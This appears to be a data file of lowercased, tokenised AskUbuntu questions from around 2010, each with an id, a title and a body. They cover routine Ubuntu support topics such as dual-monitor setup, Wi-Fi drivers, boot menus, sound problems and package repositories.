7517	what is the relationship between mime types and file .extensions ?	i may have the wrong idea here , but i thought that : mime types are identifying codes , embedded inside a file . file .extensions are idenifying codes , suffixed to the file 's name . i thought , from something i heard in the dim dark ages , that linux was .extension agnostic ... ( maybe it was in the early days , and things have changed since then ... ? ) i 've recently come from the windows world , where , at the operating-system level , a file .extension is the only way ( as far as i know ) to associate it with its relevant application program . because i do n't know why , i find it a bit disconcerting that a file named `` fred '' and a file named `` fred.txt '' both open up in a text editor . is there a clear-cut hierarchy at work here ?
7519	is there anyway to use google talk , with my google apps account ?	i have a google apps acount where i work at , and we use google talk to communicate . any help or ideas would be appreciated .
7520	fluxbox - how to configure dual monitors ?	i have a nvidia 9800 video card and i previously setup my screen through the nvidia x server settings tool . but when i switch from gnome to fluxbox , it appears that my two monitors are treated as a single screen . how do i configure my screens so that i can mouse between them and have separate background images , etc ? update : here is my current xorg.conf file : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 1.0 ( buildd @ yellow ) fri apr 9 11:51:21 utc 2010 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` aci asus vh236h '' horizsync 30.0 - 85.0 vertrefresh 55.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 9800 gtx+ '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp-0 : nvidia-auto-select +1920+0 , dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 1.0 ( buildd @ yellow ) fri apr 9 11:51:21 utc 2010 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` aci asus vh236h '' horizsync 30.0 - 85.0 vertrefresh 55.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 9800 gtx+ '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp-0 : nvidia-auto-select +1920+0 , dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection
7529	how to activate wifi in toshiba satellite c655 ?	i 've recently bought a toshiba satellite c655 . it came with windows 7 preinstalled . i 've never had a notebook before , but as a desktop user , i was a ubuntu user since 2 years , and i 've never had a problem with drivers , wifi , etc . when i tried to install the ubuntu 10.04 , and also the new and fresh 10.10 , in my new laptop , i experienced some troubles with some of the componentes of my computer . for example , i was not able to activate my wi-fi card , although i know the kernel recognizes it correctly , because when doing `` lspci '' at the terminal , it was listed . anyhow , i 'm not able to `` activate '' the wifi , or whatever it 's necessary to do in order to be able to search for public networks available , and to connect with them . the wifi-card the laptops brings is the ( the lspci output ) : 03:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) [ 168c:002b ] ( rev 01 ) . it 's anything in you can help me ? thanks a lot in advance ! edit neither solution seems to work . in first place , i 've tried installig what hhlp told me . after the installation , nothing seems to change : on right-clicking the wireless icon , it seems to recognize the card , because the option `` enable wifi '' was ticked . but , once again , i was not able to `` turn the wi-fi '' on . in second place , i did n't try installing the drives , because the card is already recongnized . the issue is that i can not seem to turn it on ! one thing i 've probably missed is that the toshiba cames with a windows sofntware that allows you to enable / disable the wifi tools . so , it does not have an external `` button '' to turn it off . i do n't know if that 's the problem , but i have the feeling that the issue may be aroud there : in how to turn on the wifi-signal ( or to verify if it 's on or off ) in my ubuntu .
7533	is there software available to benchmark networking equipment ?	is there software , or a utility , available on ubuntu that i could use to benchmark ( performance test ) traffic and throughput on networking equipment ( specifically cisco switches or routers ) ?
7537	how can i reverse the 'fn ' key on an apple keyboard so that f1 , f2 , f3 ... are used as default ?	to be more clear , right now the volume and brightness keys are used and i have to hold 'fn ' in order to execute an f1 , f2 , f3 , f4 , f5 ... command . can i reverse this so it 's function key by default and holding 'fn ' enables the volume and other special controls ?
7539	how can i sync my home folder over network and internet ?	i use my laptop with ubuntu-desktop to do all my work , but i also have a low-end desktop over at my office just sitting there . i 've decided i 'm going to install ubuntu-server on it and use it to mirror my entire laptop home folder , to make things easier when i decide to format my laptop 's hard-disk . whenever i 'm at work , both machines are connected to a network and communicate easily ( and high-speed ) via ssh . when i 'm not at work , the desktop is still accessible via ssh . ideally , the syncing would take place automatically in the background , whenever i change something . it only needs to be one way : the changes i make on the laptop have to be synced over to the server , but the inverse is not necessary . i know there 's software for this out there , my question is : what software can i use to achieve the above objectives and also take full advantage of local-network speeds when i 'm at work ? since i 'll sometimes deal with large files , the syncing process needs to realise that the two computers are sharing a local network , and then take advantage of that ( instead of always syncing through the internet ) . just to be clear , over-the-network syncing is actually more important to me here than over-the-internet syncing . i ideally the software would check if the former is available and , if not , try the latter ; but if that 's not possible , the first case is my priority . hope this is n't too long . thanks in advance .
7543	how to create a music cd from mp3 files ?	are there any nero burning softwares for ubuntu ? the most important is to able burn mp3 or songs files into the cd/dvd = )
7545	why does a `` glib-warning '' error briefly appear on-screen when entering or leaving suspension ?	i see the following on-screen for a brief moment when entering or leaving suspension : ( process : # # # ) : glib-warning ** : getpwuid_r ( ) : failed due to unknown user id ( 0 ) any idea what this is , how i can get rid of it , and if it 's something i should be concerned about ? it 's been happening ever since i installed 10.10 64-bit ( fresh install ) âi do n't recall it ever happening under 10.04 64-bit . thanks !
7552	can not suspend dell inspiron	since installing 10.10 , my dell inspiron was able to suspend both when i closed the lid or chose to suspend from the menu . at least it was until yesterday . now if i close the lid the computer freezes . if i open the lid , the screen is black and will remain black until i force shut-down the computer . trying to suspend from the menu also does not work , the screen goes black and the system freezes . a bit of googling brought up a bug that might be a possible cause ? https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/522998 it says : `` when the xhci module is loaded the system can not suspend . manually unloading xhci will allow suspend to complete normally . if suspend_modules= '' xhci '' is added to /etc/pm/config.d/unload_module then the system can suspend normally . looking in /etc/pm/config.d/ i see an empty dir . does anyone know if this could be a solution , how to implement it if it is ( make a new file unload_module and add the line in question ? ) , and , if not , other ideas on where to go , or hardware tests to run ?
7558	change layout & appearance on 10.10	i recently upgraded to 10.10 from 10.04 . i got the netbook version . i like the new interface but it is a bit slower that the older version . is there anyway to revert the current looks back to the another layout that does not consume as much resources ? how do i change the layout so that i get rid of the launcher , bring back taskbar , etc ?
7561	how to change the color of menu text ?	first , take a look at this screenshot . http : //picpaste.com/pics/screenshot-4yf1uqrf.1287160366.png now , i managed to change the selection color from orange to light gray which is very nice . but now i 'd like to change the text color of inactive/disabled menu items which are in black as you can see `` available '' `` away '' and `` busy '' , the text is black . i 'd like it to be gray for example but i do n't know how to change the color of that text . thanks !
7569	how to change the menu order of burg	i have burg installed with grub2 to provide nice grub themes on my grub loader . i have it all setup right but i want to know if it 's possible to change the order of my menu icons . as of now , i currently have the ubuntu icon first and then windows . i would like to switch them around , so windows is first and then the ubuntu icon . i know i can change te burg config to make windows be selected as the one to boot if no keyboard input is committed during the timeout , but i 'd like to be able to control the order of the icons . if it helps the burg theme i 'm using is refit thanks .
7575	hard drive partition naming convention in linux	what is the hard disk drive partition naming convention in linux ( for example : [ hd0,0 ] etc ... ) ? what does it actually mean ? what is the significance of this when i need to install multiple operating systems on the same machine ? how can we relate it to windows partitioning ( example : c : \ drive or d : \ drive ) ?
7576	what software can be used to create a restorable drive image ?	not sure what linux software i would use for this , basically just like acronis true image for windows , but for linux . the rule is that we are keeping windows out of the equation , i want to be able to rely solely on ubuntu to handle the management and restoration of backup images .
7578	unlock keyring prompts three times instead of one time	when i have `` automatic login '' activated , the `` unlock the gnome keyring '' box asks for my password . but this happens three times . there are three boxes asking me for my password . in 10.04 the box appeared one time .
7585	will running dual monitors have any significant impact on system speed ?	will setting up dual monitors on a decent-but-not-too-powerful machine significantly slow down my system ? for specifics to my system , this is a 2ghz intel dual-core laptop with 4gb ram and a decent integrated video card , has no problems running multiple applications with compiz and effects . the monitors in question are integrated 1366x768 laptop screen and external 1200x800 monitor , nothing fancy or outrageous . so , in your experience / knowledge , will running dual-monitors significantly detriment operation speed ?
7587	how do i disable the `` enable/disable wireless '' shortcut key on my laptop ?	on my dell studio xps 16 , i sometimes accidentally hit this key . wireless becomes disabled , and hitting it again does not re-enable wireless . i have to hit it an odd number of times , then restart my computer to re-enable wireless . i ca n't imagine a situation in which i would want to disable wireless from my keyboard . is it possible just disable the key all-together , so i can avoid this problem ? on a related note , what package do i file the bug against ? i 'm happy just disabling the key , but that 's really just a workaround .
7605	what terminal emulators are available for heavy terminal users ?	i spend a lot of time at the command-line during the workday and at home too since i run ubuntu exclusively . i 've been using the default gnome terminal but i 've reached a point where i 'd really like to get my terminal tricked out so that my common tasks are as easy as possible . specifically , i find that i spend of lot of time browsing code in the terminal and working in config files . on my wish list would be : ability to have multiple screens , tabs , windows ( i do n't have a preference at this point ) that i can easily switch between . color coding for everything easy to modify the aesthetics of the terminal ( is it vain to want my terminal to look nice ? ) such as transparency , borders , etc .
7617	where is stable cardapio ?	i try to install cardapio but i saw tha is unstable . is any stable release and if not when wil be stable . in cardapio launchpad theres is not any schedule .
7624	how can i figure out the add-apt-repository command by looking at a launchpad project ?	to install programs from launchpad , you can add a repository to the software sources list ... i know how to look at a launchpad page and add the repository & public key through the `` software sources '' gui page , but i 'd rather use the add-apt-repository command as this finds the key for me.. and i 'm too lazy to grab it from the launchpad page , save it , then import it . my problem is that i have no idea how to figure out the right command for a particular project ? ? for instance , cardapio uses the command : sudo add-apt-repository ppa : cardapio-team/unstable but i ca n't see cardapio-team/unstable written on the launchpad page : https : //launchpad.net/cardapio ? ? is it possible , or is this address completely separate to launchpad ? thanks !
7629	how can i identify what version of ubuntu is installed in a specific partition ?	i have two versions of ubuntu installed on my laptop 10.04 and 9.10 . they are installed on separate partitions ( let 's say /dev/sda1 and /dev/sda2 respectively ) , but i forgot which is which . i 'm now booting through livecd ( i 'm troubleshooting a grub issue ) , but i need to know which partition contains the lucid install . i have full access to the contents of each partition , so it must be easy to find out . i just do n't know which file to look into .
7636	vmware player modules not saved into ubuntu kernel	i 'm running ubuntu 10.10 with the 2.6.35-22.34-generic kernel and have the latest vmware player installed , but each time i run vmware player it says it needs to load some modules into the running kernel . it does this every time i run vmware player . it seems to install the modules ok as vmware player runs after it 's apparently installed the modules , but the modules are n't saved as it constantly keeps saying it needs to load modules . is there anyway to fix this , other than trying to go for a reinstall ?
7643	does ubuntu tweak add ppa	i know downloading softwares from ubuntu tweak usually installs the latest stable , but does it also adds the ppa of the respective software ?
7644	possible problems in mixed use of apt-get , aptitude and synaptic	even though aptitude and synaptic are both front-end to the apt ( and i myself stick only with apt-get ) , peculiarities in each of the available dpkg/apt frontends seem to cause problems and confusions when they are used interchangeably . beginners especially -- who tend to do copy & paste more often , thereby executing apt-get and aptitude commands more or less identically -- may find some situation puzzling . please list the possible problems that might arise when they are mixed up and tips to avoid when one has to rely on multiple packaging managers .
7645	sound over hdmi not working any more after waking up from suspend	so far , suspending to ram and waking up from it works . my laptop 's external display ( connected via hdmi ) works , too . however , what does n't work is the sound , which works before suspending , of course . i 'm using my external monitor 's speakers and have made the corresponding settings in ubuntu 's sound menu ( switched to `` digital stereo ( hdmi ) output + analog stereo input '' in `` hardware '' tab ) . what can i do to fix it ? edit : when i ran ubuntu-bug , it tested sound output with and without using pulse . without pulse , it worked , however i still heard the noise . with pulse it was only noise . edit : works fine with natty and oneiric now . updating to latest ubuntu solves the problem .
7648	many directories have a `` .d '' suffix/extension . what does it mean ?	my system has 132 directories whose names end in .d there are also two scripts whose names end in .d aside from the two wayward scripts ( '/usr/sbin/invoke-rc.d ' , '/usr/sbin/update-rc.d ' ) , i assume that .d means directory ... ( but i do wonder why those scripts are so named ) . in some cases , the .d directory 's parent folder contains a file of the same name , but without the .d ending . # eg . /etc/apt/sources.list.d /etc/apt/sources.list is there some mystical linux rationale to this naming style ? is it a deeply entrenched naming convention , or is it about as absolute as 'foo ' and 'bar ' ?
7653	repartitioned my drive and now the ubuntu livecd installer always fails to install grub !	ok . i installed ubuntu 10.04 a week or so ago over an old ubuntu partition - no problem . grub went on fine ( it had previously been overwritten by windows ) . then , after remembering how much i like ubuntu and using a terminal i thought i 'd upgrade to 10.10 and increase the size of my linux partition ( the ntfs partition on that drive was barely used ) . after doing this i continued the ubuntu installer ... all was fine until near the end when i was told that it had failed to install grub ... i attempted to install it on any of my other partitions and they all failed with the same message ( though i 'm not convinced they even tried ) . i then went back to the 10.04 cd and tried that again , same error , grub would n't install anymore . is this due to grub already being in the mbr or have i broken something when i partitioned ? partition table is below : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xdeb64491 device boot start end blocks id system /dev/sda1 1 24352 195599609+ 7 hpfs/ntfs /dev/sda2 24352 38560 114130859+ 83 linux /dev/sda3 38560 38914 2839553 5 extended /dev/sda5 38560 38914 2839552 82 linux swap / solaris ***please note that i 've since installed grub manually and have ubuntu setup the way i like it , so i do n't want to overwrite the whole install again if it 's unnecessary . if i need to test any of these answers is it possible to do without reinstalling the system files ?
7654	how do i set up ruby on rails ?	i am interested in setting up a ruby on rails environment on my 10.10 laptop . is there anything special i need to keep in mind for installation ( i.e . that could be new or unique to 10.10 ) ? are there any suggested walkthroughs that i could follow along with ? thanks in advance .
7659	can i update software installed from source code directly	though its nearly a year since i started using ubuntu , i have not attempted installing software from source . i did n't actually find the need to do so . but now i am working on a software which is at the release candidate stage in the repositories but the latest stable version 's source code is available at the software home page . i learnt that installing from source code may be difficult if the software has many dependencies . however if i tackle that , i can be happy with the latest version . but i keep wondering if such a software can automatically update itself or will i have to run some scripts to update the package . or still worse will i have to reinstall each update from scratch ? also i am eager to know if there is any specific advantage of installing from source other than the above .
7662	is there any guarantee that software from launchpad ppas is free from viruses and backdoor threats ?	as linux continues to grow and develop , and the more we use linux , the greater the threat from viruses . we also know that a virus/threat in linux ( if any ) would have difficulty running or spreading when it is running as a normal user , but it is a different story if the virus/threat is running as the root user . an example of this danger would be if a virus is tucked inside a ppa ( intentionally or unintentionally ) or if an application has an intentionally planted backdoor ( e.g. , pidgin could secretly send passwords to a particular address ) . if we add software from a launchpad ppa , is there any guarantee that software is from free viruses/backdoor threats ?
7663	is the bug about kernels increasing temperature fixed ?	i 've read about a bug in the first versions of kernel 2.6.35 that causes the temperature to increase above the normal . does anyone knows if it is already corrected ?
7664	recover partition in / which is umounted	i have a partition /data which supposed to store data and its format is ext4 . since it not in home folder and i forget to format it as fat at the beginning , i can not copy any file into here unless i use root access . eventually i decide to umount it . after that , i always get the prompt /data is not mounted . press s to skip , or press m to manually recover at booting screen . it is a bit annoying to me . if i manually recover by mount command , i can see /data visible but for just only that time . the next time the message appear again . anyone give me some suggestions ? thanks . btw , how could i change the partition format from ext4 to fat ? i am using ubuntu 10.04 .
7674	share internet connection with symbian device , no , not the other way around	i do not have data on my phone , and i was wondering if anyone out there knew how i would go about sharing my laptop 's internet connection with my symbian s60v5fp3 phone . how can i do such a thing ?
7675	init premount script error from dropbear	i get the following error at early boot stage : ipconfig : eth0 : siocgifindex : no such device ipconfig : no devices to configure /scripts/init-premount/dropbear : . : line 32 : ca n't open /tmp/net-eth0.conf i have uninstalled/purged dropbear , but i still get the error . as i had the complete tar.bz backup of my system taken soon after the installation , when i restored it , the error did n't show up . but when the system got a kernel update , again the same problem occurred . i am using ubuntu 10.04 desktop edition on asus eeepc 1005px ( atom n450 ) . edit 1 : there were no scripts in the /scripts/init-premount/ directory . there was a dropbear directory in the /initramfs-tools/etc/ directory . i removed it and did : sudo update-initramfs -u but again that dropbear directory appeared .
7676	function of /etc/cron.hourly	if i create a script and then place it in this folder ( /etc/cron.hourly ) , will my system run this script hourly ? or does my script need to begin with a command as well ?
7686	what happens to ldap user authentication and nfs home directory shares when away from the network ?	at present i have several machines on the home network which are a mixture of static desktops and laptops . its getting unmanageable for me and impractical for all of them to have local home directories , settings and security so i am considering using ldap for common user management and nfs for shared home directories . what happens when one of the laptops are out on the road ? the home network is unreachable so will auth fail and fall back to local storage ? also , when the laptop returns is there a way to resync the home storage to the nfs server ?
7687	about plymouth on 10.10	there are several questions regarding plymouth : 1.is it safe with ubuntu maverick 10.10 ? 2.is it reversible ? 3.if thing goes wrong , what are the effects ? 4.will it clash with burg ? ? thanks ^^
7689	can not connect through wireless interface on a server ?	lshw -c network shows *-network description : wireless interface product : ar5001 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 00:1f:3a:01 : c7:6a width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=2.6.35-22-server firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bg resources : irq:19 memory : f6000000-f600ffff
7695	how to mount nfs root in maverick	after upgrading to 10.10 maverick , my nfs root is not mounted correctly during boot . what is the correct method ? 10.04 and earlier i had my /etc/fstab setup to use /dev/nfs as my root device , but it looks like that no longer exists . is anyone else using 10.10 for nfs boot ?
7697	what options are there for indexing my filesystem ?	wondering what people are using to index and search their file systems . i 'm looking for something with low resource usage , but with capability of indexing a large number of files in my /home folder ( including documents , music , videos etc ) and with a native gui for searching these . a bonus would be if it can index and search based on metadata/document content , as i do n't always remember the name of the file i 'm looking for ( particularly when trying to find documents ) . currently running ubuntu 10.10 . i was previously using gnome-do for quick file access which was fantastic , but it would n't let me index my entire /home folder ( said there were too many files ? ) . any other good indexing options available ?
7700	gma 5700 mhd dell vostro 3300 externel vga monitor is flickering	i use the dell vostro 3300 und ubuntu lucid 10.10 . the vga for the external monitor is flickering . the problem seams to be the intel graphics . lspci / grep “vga” says : vga compatible controler : intel corporation core prozessor integrated graphics controler ( rev 18 ) dell told me on the telephone it is the gma 5700mhd has somebody an idea , what i can do ?
7704	unable to enumerate usb device	my syslog is constantly filled with messages like this : oct 16 11:48:35 my-laptop kernel : [ 61470.980078 ] hub 1-0:1.0 : unable to enumerate usb device on port 2 oct 16 11:48:35 my-laptop kernel : [ 61471.192079 ] hub 3-0:1.0 : unable to enumerate usb device on port 2 the only usb device i use is microsoft natural wireless laser mouse 7000 . the laptop model is hp dv9500 , ubuntu 10.10 , but the same was in the versions before . how can i fix this ? edit : here 's the output of sudo lsusb : bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 003 : id 045e:071d microsoft corp . bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub all usb devices seems to be working fine . i have some problems with dvd-r and sound card , but they are not usb .
7707	remove an extra entry for windows 7 in burg or grub ?	for some reason i have two entries for the same copy of windows 7 in burg ( and before i installed burg , there were two in the grub menu as well ) . they are on different partitions but they boot into the same windows . i think one is the recovery partition maybe . but they are both the same . i would just like to remove one of them so i have a clean boot screen with one ubuntu and one windows option . i figured out how to take the ubuntu recovery mode off of the list , but i think the windows problem is too complicated for me . any help would be greatly appreciated . thanks in advance .
7709	can i configure mutter to unredirect fullscreen windows ?	i tried a google search on the subject ; however i came up with nothing . is there a way i can enable this option so i can enable good 3d performance while using unity ?
7710	installing on a lenovo s10-3	i 'm trying to install ubuntu 10.10 netbook edition on my lenovo s10-3 . according to the release notes , there is a bug in the kernel that forces me to add intel_idle.max_cstate=0 to the kernel parameters . i did this when booting the install cd and i was able to install ubuntu . during the installation i chose to fetch updates from the net . now when i try to boot the machine it just hangs . i have tried booting the machine as-is and i have tried adding the above-mentioned kernel parameters . same experience . so , my questions is how do i install 10.10 in this machine and how do i boot it after i 've installed the os ?
7711	low and crackling sound	as the title says , i get very low sound in ubuntu , and when i raise the volume , it sounds `` cracked '' in windows it works fine . i 've got a realtek alc800 soundcard , intel ich6 controller . i have tried everything , from changing the alsamixer configuration to installing the newest alsa drivers , and changing that alsa modprobe conf thing . any ideas ?
7715	can i use ( only ) the super key as a shortcut ?	usually in gnome and kde it is only possible to define shortcuts with the super key in combination with another key . but is it possible to use only the super key as a shortcut , and how could i achieve this ?
7716	how can i have rhythmbox download album art for tracks ?	i ca n't seem to find an inbuilt way to have rhythmbox fetch album art for tracks -- stock plugins also do n't help . is there any external package that could do that , or am i maybe missing something ?
7717	set volume levels by application in sound indicator applet ?	is there any way to set appliactions sound ( separately by application ) in the new sound indicator applet like in the `` sound preferences '' window ? thanks !
7723	setting up dual monitors	just installed a fresh copy of maverick , and went from my two monitors working perfectly to broken in seconds . as usual i configured the monitors in the display applet , this worked fine . i also hit make default which gave me no problems . i then restarted and the monitors had gone back to mirror screen . i changed them back again and hit make default which gave me a message about setting the virtual desktop resolution . after this any changes i make to the monitors give me the message `` please log out and back in again '' - i 've tried that and restarting but still can not configure the monitor resolutions . any ideas on how i can revert this ? some searching indicates the problem 's with xorg but i 've no idea where to go further than this . here 's the relevant lspci output : 01:00.0 vga compatible controller : ati technologies inc m92 [ mobility radeon hd 4500 series ] i tried extending the desktop using ati 's catalyst tool but this still mirrored the screens . does this mean the drivers are n't being used ?
7724	how to create a ubuntu netbook 10.10 unity vm under virtualbox	i 'd like to run the new unity interface from ubuntu 10.10 inside of a virtualbox vm ( host is ubuntu 10.04 ) . is that possible ? thanks !
7726	where can i get the 'ubuntu monospace ' font ?	although there is supposed to be a monospace font in the family , the default package does n't come with it . i tried getting ttf-ubuntu-monospace but there are n't any packages with that name . how/where can i get the monospace font ?
7737	internal microphone is not working after upgrade	my laptop is thinkpad edge , intel platform . my internal microphone stopped working after i upgraded to ubuntu 10.10 . internal audio analog stereo is checked in sound preferences- > input . when i run sound recorder - input level in sound preferences is not changing . what should i do to fix this ?
7740	shared folder access in lan between ubuntu 9.10 and windows xp	in my home , i am have 3 machines and all are in lan . out of 3 , one machine is windows loaded and i need to get the shared folders from windows from my ubuntu 9.10 . previously i had accessed the windows shared files ( through smbclient ) from my ubuntu 8.10 , but in newer version i ca n't able to do that . how can view the shared files in gui/shell from ubuntu ( samba client or any other mechanisms ? )
7742	move application between monitors in dual screen setup	i have dual screen setup for my ubuntu 10.10 machine , but whenever i try to move an application to another screen by dragging it , it moves to another workspace in my primary monitor instead of second screen . am i missing something here ? is there any way to drag my application to another screen instead of another workspace ? i 'm using gnome and nvidia graphics card .
7749	how can i overclock a graphics card from within ubuntu ?	i would like to boost the core frequency , shader clock , and memory clock on an evga gtx 480 i have in my development box running 10.04 . is it possible to overclock a recent graphics card from within ubuntu ? i tried the coolbits approach , but i could n't get this to work . i also tried nvclock , but as it has't been updated since january , 4th , 2009 , it does n't work with my card . in windows , the driver itself ships with the ability to overclock the cards , but nvidia appears to have left this out of the linux drivers . has anyone discovered a solution ? or would it be possible to stage the windows drivers within ubuntu ? ( ick ) if there is a more appropriate forum to ask this question in , i 'd be happy to do so -- but i 'm hoping for a solution within ubuntu . thanks ! update : it appears that i may need to have `` coolbit '' `` 5 '' as discussed here . hmm . nope . here is the relevant section of my xorg.conf file : section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 460 '' busid `` pci:2:0:0 '' option `` coolbits '' `` 5 '' option `` nologo '' `` true '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 480 '' busid `` pci:3:0:0 '' option `` coolbits '' `` 5 '' option `` nologo '' `` true '' endsection when i restart with coolbits set to 5 , i can enable fan control on gtx 460 . i can also set it to maximum performance mode . i can not change the clock frequencies . i am about to try different levels . but here is what i see ( with coolbits = 5 ) : update 2 : i 've tried driver version - 260.24 ( beta - nvdeveloper ) & 260.19.12 ( released today ) . i am not able to see the `` clock frequencies '' tab for any of the 4xx cards . i can however alter the fan speed for the card with a display attached . i 'm going to ask a second question and wait for better drivers to be released .
7752	kubuntu hangs in the splash screen after login	i switched my wife 's notebook from ubuntu 10.10 to kubuntu 10.10 ( by installing kubuntu-desktop ) , but sometimes ( not always ) after filling in username and password , kububtu hangs in the post-login splash screen ( as if it would take forever to bring up the desktop ) . cpu usage is not high . i have no idea why it happens . i saw reports of some problems with login , but not specifically like this ( hanging on that splash screen after loggin in ) . did this happen to anyone else ? is there any fix or workaround that i could try ? thank you !
7757	how can a non-geek set up a proper firewall ?	maybe a non-geek that knows of the existence of a firewall is already some kind of a nerd . if you have been a windows-user then it was rather easy to set up a firewall ( i do n't know if it was a good one ! ) : enable a firewall with maximum protection . then for each program that tried to make an internet-connection a notification was shown ( allow or not allow ) . in this way without any prior knowledge of protocols and ports a user could set up a firewall that was suited to his needs . is there any equivalent program in ubuntu so that any user can set up a proper firewall ?
7760	what does rhythmbox do the first time it is run ?	background : i have never used rhythmbox on this computer . i just accidentally opened rhythmbox while my mp3 player was plugged in . without asking me or explaining what it was doing it started `` importing ... '' with high disk io activity in my home folder . i exited the program to stop it , but not before it reached about 30 % completion . what did it just do ? i can not find any documentation of this behavior on the rhythmbox website or the ubuntu community documentation . update : it occurred to me that the io activity i saw on my home folder might just be coincidental , if rhythmbox defaults to scanning my home folder when it is first run . i found this in its preferences screen : does this help explain what rhythmbox was doing ? if it 's relevant , i do not have music folder in my home folder .
7762	denyhosts server_sync option , call for anecdotal reports	i 'm securing my ssh server with denyhosts , and decided to dig into denyhosts ' configuration to make sure things looked good . there 's an option called server_sync , that makes an xmlrpc call and seems to crowdsource securing an ssh server by using denyhosts ' central server to collect statistics about bad hosts . i 'm intrigued by the idea , but before making such a drastic change i wanted to know , are other people using this ? if so , please write a little about your experience with the sync_server option in denyhosts and any issues i should watch for . thanks .
7766	does twinview work with nvidia sli ?	this might be a rubbish question for askubuntu but i 'm getting a hardware itch and i think the cheapest way to alleviate it is by chucking another nvidia gtx 260 in my box and strapping it to my existing one ... but i use twinview ( that is two monitors coming out my one card ) showing a single screen . i also use compiz and i also play games , and watch video using vdpau . so before i spend âł100 on another card , i 'd like to know what i 'm getting myself in for . does twinview work with sli ? does 3d performance increase as much as it does in windows ? where 's wally ? should i just forget it for now and buy a mid-range 5xx in a year or so ?
7768	how can i run a fake x server & link it to a specific gpu ?	on this page the final post mentions xvfb as a way to run a fake xserver . is it possible to tie this directly to a specific card as if a display was attached ? ? specifically , i 'd like to overclock my gpus , but short of that ( since the clock frequencies tab wo n't make an appearance ) , i 'd like to at least crank up the fan so that my cuda kernels can run on a cooler gpu . to do so within the driver framework , a display must be attached to the card . but if i do that , then i ca n't set the card to `` compute exclusive '' mode . basically , does anyone know of a way to attach a fake ( software based ) display to a specific gpu in ubuntu ?
7769	keyboard shortcut for pasting the primary selection	is there a standard or conventional keyboard shortcut for pasting the primary selection ? i 'd like to select some text and go to another app to paste without trashing my clipboard contents . i 'd rather keep my fingers on the keyboard than move to the mouse , find the pointer , position it where i want , and middle-click . if there 's nothing conventional , or if it 's application-specific and unsupported by many , is there a workaround to get this working globally ? ( or at least in more applications . )
7771	k9-like program that blocks websites ?	in windows there is a very good program which block inappropriate sites called k9 web protection i was wondering is there a program like that or a good option to block inappropriate sites ?
7776	how do i lock the desktop screen via command line ?	how can i lock my desktop screen from the command line ?
7788	is there any way i can completely hide docks while working on a maximized window	i use docky and glx cairo dock , i really love dock but one thing that really keeps me from using dock is the fact that none of these give you the option to completely hide them while you an option to hide them completely while you are working on a maximized window , so it gets annoying when you want to click somwhere and your mouse hovers over the dock area and dock pops up . is there any way i can completely hide these docks while working on a maximized window.i remember rocket dock on windows can do this by default . and what about the dock in mac , is it the same ?
7789	what can i use to transcode and transfer music to my digital audio player at the same time ?	i would like to keep only the original copies of my music on my computer , and then optionally transcode them if necessary when transferring them to my mp3 player . what can i use to accomplish this ? which media players have this ability built-in ? can i set up a transcoder to watch a folder for files to be transcoded and then moved to my mp3 player ? what potential is there for creating the functionality i need using a media player 's plugin or scripting interface ?
7797	which is the preferred environment to start hacking unity ?	i feel like hacking into unity and spent a couple of minutes looking for development documentation , source code , components , the stack of aplications used , etc . it all seems to be buried in the results . ca n't find anything related . can anyone point me a good direction ?
7798	how do i arrange my windows automatically ?	is there some equivalent of windows ' `` tile windows '' in ubuntu ?
